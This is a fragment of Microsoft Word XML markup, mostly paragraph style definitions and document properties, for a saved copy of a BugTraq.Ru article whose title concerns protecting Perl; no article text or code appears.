      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="r">
    <w:name w:val="r"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="l">
    <w:name w:val="l"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="captionc">
    <w:name w:val="captionc"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="captionr">
    <w:name w:val="captionr"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="captionl">
    <w:name w:val="captionl"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smallc">
    <w:name w:val="smallc"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smallr">
    <w:name w:val="smallr"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smalll">
    <w:name w:val="smalll"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tt">
    <w:name w:val="tt"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ttb">
    <w:name w:val="ttb"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mt">
    <w:name w:val="mt"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ml">
    <w:name w:val="ml"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mltitle">
    <w:name w:val="mltitle"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mls">
    <w:name w:val="mls"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="field">
    <w:name w:val="field"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="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color w:val="000000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="message">
    <w:name w:val="message"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="check">
    <w:name w:val="check"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="button">
    <w:name w:val="button"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="buttons">
    <w:name w:val="buttons"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml1">
    <w:name w:val="ml1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="z-0"/>
    <w:hidden/>
    <w:uiPriority w:val="99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link w:val="z-"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden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link w:val="z-1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="captionl1">
    <w:name w:val="captionl1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"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15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a6">
    <w:name w:val="с"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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10119</Words>
  <Characters>5768</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>48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BugTraq.Ru: Защищаем Perl: шунт в мозг, или зверская нейрохирургия</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>PERSONAL COMPUTERS</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15856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BugTraq.Ru: Защищаем Perl: шунт в мозг, или зверская нейрохирургия</dc:title>
  <dc:subject/>
  <dc:creator>USER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-26T07:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-26T07:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>